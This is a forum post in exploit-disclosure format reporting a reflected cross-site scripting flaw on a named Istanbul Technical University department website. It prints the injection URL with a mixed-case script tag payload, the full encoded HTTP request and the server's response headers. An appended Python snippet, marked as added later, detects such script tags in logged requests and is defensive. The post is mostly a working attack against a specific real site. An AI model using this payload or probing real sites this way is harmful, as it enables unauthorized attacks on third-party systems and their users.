Ehb.itu.edu.tr Vulnerability / Part 1

Dj_Taleh

We need to report this as soon as possible.
I found it a few minutes ago.
There is more to come...

Code:
# Exploit Title : Istanbul Technical University Department of Electronics and Communication Engineering XSS
# Author [ Discovered By ] : Dj_Taleh / SpyHackerz.Org
# Date : 04/03/2020
# Vendor Homepage : http://www.ehb.itu.edu.tr/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-79


/index.php?bib='"()&%1<ScRiPt >prompt(912383)</ScRiPt>&id=bibtexbrowser&lang=tr&year=2016


Request

GET /index.php?bib=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28912383%29%3c%2fScRiPt%3e&id=bibtexbrowser&lang=tr&year=2016 HTTP/1.1
Host: www.ehb.itu.edu.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*



Response


HTTP/1.1 200 OK
Date: Mon, 02 Mar 2020 20:59:17 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: private, must-revalidate
Expires: Mon, 02 Mar 2020 21:09:17 GMT
Content-Length: 17802
Keep-Alive: timeout=15, max=31
Connection: Keep-Alive
Content-Type: text/html
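
A defensive check for the request shown above, as an added example that is not part of the original post: it percent-decodes every query parameter of a logged request line (repeating the decode to catch double encoding) and flags script tags written in mixed case or with padding whitespace, the form used in the `bib` value. The function names and the benign sample line are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Opening <script tag in any letter case, with optional whitespace or
# attributes before '>', which covers the "<ScRiPt >" form in the post.
SCRIPT_TAG = re.compile(r"<\s*script\b[^>]*>", re.IGNORECASE)

# Request line copied from the post above.
PAGE_REQUEST = (
    "GET /index.php?bib=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28912383%29"
    "%3c%2fScRiPt%3e&id=bibtexbrowser&lang=tr&year=2016 HTTP/1.1"
)
# Constructed benign request for comparison (assumption, not from the post).
BENIGN_REQUEST = "GET /index.php?id=bibtexbrowser&lang=tr&year=2016 HTTP/1.1"


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded input is seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_request_line(request_line):
    """Return a list of (parameter, reason) findings for one request line."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return []  # not a "METHOD target VERSION" line
    query = urlsplit(parts[1]).query
    findings = []
    # parse_qsl splits on '&' first and then decodes once, so an encoded
    # '&' (%26) inside a value does not start a new parameter.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SCRIPT_TAG.search(fully_decode(value)):
            findings.append((name, "script tag in value"))
    return findings


if __name__ == "__main__":
    for line in (PAGE_REQUEST, BENIGN_REQUEST):
        print(scan_request_line(line), "<-", line[:60])
```

A match here only shows that the request carried markup; whether it is reflected depends on the page encoding the `bib` value for HTML before writing it into the response.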
 